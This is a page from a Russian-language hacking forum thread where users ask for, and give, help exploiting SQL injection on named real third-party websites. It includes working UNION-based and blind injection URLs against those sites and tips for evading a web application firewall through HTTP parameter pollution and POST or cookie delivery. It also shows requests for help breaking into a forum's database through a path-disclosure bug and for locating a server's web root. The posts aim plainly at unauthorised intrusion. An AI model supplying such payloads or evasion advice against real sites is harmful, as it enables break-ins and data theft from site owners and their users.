FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1785 из 2422

1785

Опции темы

Поиск в этой теме

Опции просмотра

21.09.2011, 22:35

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от wkar

wkar said:
Подскажите, как крутить MS Access http://www.kzr.spb.ru/news-temp.asp?id=-1' ?

http://www.kzr.spb.ru/news-temp.asp?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+from+msysac cessobjects

22.09.2011, 10:32

rad_scorp

Guest

Сообщений: n/a

Провел на форуме:
4017

Репутация: 1

Цитата:

Сообщение от Tigger

Tigger said:
Как варианты попробуй:

Да, это waf. Блокирует слово union "as such", под любым соусом в GET. Ищу возможность его как-то разбить на части, но похоже это невозможно.

Вот что можно:

Код:

Code:
like 
concat 
group_concat
version 
id=(1)
symbols: # -- /**/ ()

А это нельзя:

Код:

Code:
union
select
update
insert

symbols: ; ,

22.09.2011, 16:50

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

попробуй post'ом

__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.

22.09.2011, 17:11

Unknown

Guest

Сообщений: n/a

Провел на форуме:
42706

Репутация: 6

Форум IPB 3.2.0,нашел раскрытие пути

Код:

Code:
Warning: Illegal offset type in /var/admin/setup/sources/classes/output/output.php on line 248

По такому адресу:

Код:

Code:
_http://insider.net.kg/admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login

Как можно юзать уязвимость? Можно ли провести как то sql иньекцию? Очень нужно пролезть в бд)

Заранее спс,за совет.

22.09.2011, 21:03

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от alerondel

alerondel said:
Форум IPB 3.2.0,нашел раскрытие пути

Код:

Code:
Warning: Illegal offset type in /var/admin/setup/sources/classes/output/output.php on line 248

По такому адресу:

Код:

Code:
_http://insider.net.kg/admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login

ну нахсел раскрытие..и что дальше? это не относится к багам которые дают доступ к БД..ищи сплоиты под эту версию форума..или баги приват покупай

23.09.2011, 02:53

rad_scorp

Guest

Сообщений: n/a

Провел на форуме:
4017

Репутация: 1

Цитата:

Сообщение от shell_c0de

shell_c0de said:
попробуй post'ом

Пробовал, даже куками, кажется.

Пробовал HPP (или HPF, я пока еще не разбираюсь ). В таком виде: id=5 and 1=0 un&id=ion итд, может, конечно, не так составил, но не заработало.

Хорошо забаррикадировались, собаки. На самом деле, насколько я могу судить, хороший, годный waf. Он анализирует строчку REQUEST_URI, я так подозреваю, потому что &asd=union вываливает ошибку тоже.

23.09.2011, 16:38

wkar

Познающий

Регистрация: 18.10.2009

Сообщений: 80

Провел на форуме:
1180165

Репутация: 11

Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?

23.09.2011, 17:21

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от wkar

wkar said:
Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?

Только blind.

http://www.mybiz.ru/article.php?id=32/**/and/**/substring(version(),1,1)=5--+%20(true)

23.09.2011, 17:23

Osstudio

Guest

Сообщений: n/a

Провел на форуме:
149611

Репутация: 81

Цитата:

Сообщение от wkar

wkar said:
Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?

Если белая страница, или вырубает на главную, значит запрос неверный, что тут непонятного??

Цитата:

Сообщение от er9j6@

er9j6@ said:
Только blind.
http://www.mybiz.ru/article.php?id=32/**/and/**/substring(version(),1,1)=5--+%20(true)

Поля подобрать можно их 14

#10

23.09.2011, 17:39

Faaax

Guest

Сообщений: n/a

Провел на форуме:
124363

Репутация: 11

Цитата:

Сообщение от Faaax

Faaax said:
есть вопрос:
собственно найти путь на сайте,всё перепробовал сайт на Windows NT
знаю,что только mysql установлен в C:\Program Files\MySQL\MySQL Server 5.1\ и могу прочитать C:\Program Files\MySQL\MySQL Server 5.1\my.ini
как ещё можно узнать где лежит дира с самим сайтом?

всё ещё нуждаюсь в ответе как найти?

Страница 1785 из 2422

1785

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ